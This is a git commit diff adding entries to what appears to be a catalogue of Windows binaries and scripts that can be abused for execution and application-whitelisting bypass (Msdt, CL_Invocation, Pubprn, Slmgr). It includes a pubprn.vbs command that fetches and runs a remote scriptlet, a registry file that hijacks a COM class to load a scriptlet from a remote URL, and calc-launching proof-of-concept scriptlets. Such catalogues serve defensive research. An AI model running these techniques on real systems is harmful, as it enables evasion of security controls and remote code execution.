Added more in new structure
parent
e4b37b00ef
commit
0eb4ec64e3
|
@ -0,0 +1,29 @@
|
||||||
|
Template
|
||||||
|
|
||||||
|
## Binary.exe
|
||||||
|
|
||||||
|
* Functions: Execute
|
||||||
|
|
||||||
|
```
|
||||||
|
Example
|
||||||
|
```
|
||||||
|
|
||||||
|
Acknowledgements:
|
||||||
|
* Name of guy - @twitterhandle
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [NameOfLink](Payload/NameOfPayload)
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://linktosomethingusefull.com
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\binary.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
Some specific details about the binary file.
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -15,6 +15,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
||||||
[Installutil.exe](OSBinaries/Installutil.md)
|
[Installutil.exe](OSBinaries/Installutil.md)
|
||||||
[Mavinject32.exe](OSBinaries/Mavinject32.md)
|
[Mavinject32.exe](OSBinaries/Mavinject32.md)
|
||||||
[Msbuild.exe](OSBinaries/Msbuild.md)
|
[Msbuild.exe](OSBinaries/Msbuild.md)
|
||||||
|
[Msdt.exe](OSBinaries/Msdt.md)
|
||||||
[Mshta.exe](OSBinaries/Mshta.md)
|
[Mshta.exe](OSBinaries/Mshta.md)
|
||||||
[Msiexec.exe](OSBinaries/Msiexec.md)
|
[Msiexec.exe](OSBinaries/Msiexec.md)
|
||||||
[Odbcconf.exe](OSBinaries/Odbcconf.md)
|
[Odbcconf.exe](OSBinaries/Odbcconf.md)
|
||||||
|
|
|
@ -5,3 +5,4 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
||||||
|
|
||||||
# OS SCRIPTS
|
# OS SCRIPTS
|
||||||
|
|
||||||
|
[Cl_invocation](OSScripts/Cl_invocation.md)
|
|
@ -0,0 +1,15 @@
|
||||||
|
## Msdt.exe
|
||||||
|
|
||||||
|
* Functions: Execute
|
||||||
|
|
||||||
|
```
|
||||||
|
Open .diagcab package
|
||||||
|
```
|
||||||
|
|
||||||
|
Acknowledgements:
|
||||||
|
* ?
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||||
|
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
## CL_Invocation.ps1
|
||||||
|
|
||||||
|
* Functions: Execute
|
||||||
|
|
||||||
|
```
|
||||||
|
. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
|
||||||
|
SyncInvoke <executable> [args]
|
||||||
|
```
|
||||||
|
|
||||||
|
Acknowledgements:
|
||||||
|
* Jimmy - @bohops
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://twitter.com/bohops/status/948548812561436672
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
## Pubprn.vbs
|
||||||
|
|
||||||
|
* Functions: Execute
|
||||||
|
|
||||||
|
```
|
||||||
|
pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
|
||||||
|
```
|
||||||
|
|
||||||
|
Acknowledgements:
|
||||||
|
* Matt Nelson - @enigma0x3
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [Pubprn_calc.sct](Payload/Pubprn_calc.sct)
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
|
||||||
|
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
||||||
|
C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,30 @@
|
||||||
|
## Slmgr.vbs
|
||||||
|
|
||||||
|
* Functions: Execute
|
||||||
|
|
||||||
|
```
|
||||||
|
slmgr.vbs
|
||||||
|
```
|
||||||
|
|
||||||
|
Acknowledgements:
|
||||||
|
* Matt Nelson - @enigma0x3
|
||||||
|
* Casey Smith - @subtee
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [NameOfLink](Payload/NameOfPayload)
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
|
||||||
|
* https://www.youtube.com/watch?v=3gz1QmiMhss
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\slmgr.vbs
|
||||||
|
c:\windows\sysWOW64\slmgr.vbs
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
Requires registry keys to work.
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,22 @@
|
||||||
|
<?XML version="1.0"?>
|
||||||
|
<scriptlet>
|
||||||
|
|
||||||
|
<registration
|
||||||
|
description="Bandit"
|
||||||
|
progid="Bandit"
|
||||||
|
version="1.00"
|
||||||
|
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
|
||||||
|
remotable="true"
|
||||||
|
>
|
||||||
|
</registration>
|
||||||
|
|
||||||
|
<script language="JScript">
|
||||||
|
<![CDATA[
|
||||||
|
|
||||||
|
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||||
|
|
||||||
|
|
||||||
|
]]>
|
||||||
|
</script>
|
||||||
|
|
||||||
|
</scriptlet>
|
|
@ -0,0 +1,24 @@
|
||||||
|
Windows Registry Editor Version 5.00
|
||||||
|
|
||||||
|
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
|
||||||
|
@=""
|
||||||
|
|
||||||
|
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
|
||||||
|
@="{00000001-0000-0000-0000-0000FEEDACDC}"
|
||||||
|
|
||||||
|
|
||||||
|
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
|
||||||
|
@="Scripting.Dictionary"
|
||||||
|
|
||||||
|
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
|
||||||
|
@="C:\\WINDOWS\\system32\\scrobj.dll"
|
||||||
|
"ThreadingModel"="Apartment"
|
||||||
|
|
||||||
|
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
|
||||||
|
@="Scripting.Dictionary"
|
||||||
|
|
||||||
|
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
|
||||||
|
@="https://gist.githubusercontent.com/enigma0x3/4373e9a63aaebe177c747af9bc6da743/raw/2207d8a1a536371aff5f61c8bef8400622868976/wee.png"
|
||||||
|
|
||||||
|
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
|
||||||
|
@="Scripting.Dictionary"
|
|
@ -0,0 +1,22 @@
|
||||||
|
<?XML version="1.0"?>
|
||||||
|
<scriptlet>
|
||||||
|
|
||||||
|
<registration
|
||||||
|
description="Scripting.Dictionary"
|
||||||
|
progid="Scripting.Dictionary"
|
||||||
|
version="1"
|
||||||
|
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
|
||||||
|
remotable="true"
|
||||||
|
>
|
||||||
|
</registration>
|
||||||
|
|
||||||
|
<script language="JScript">
|
||||||
|
<![CDATA[
|
||||||
|
|
||||||
|
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||||
|
|
||||||
|
|
||||||
|
]]>
|
||||||
|
</script>
|
||||||
|
|
||||||
|
</scriptlet>
|
Loading…
Reference in New Issue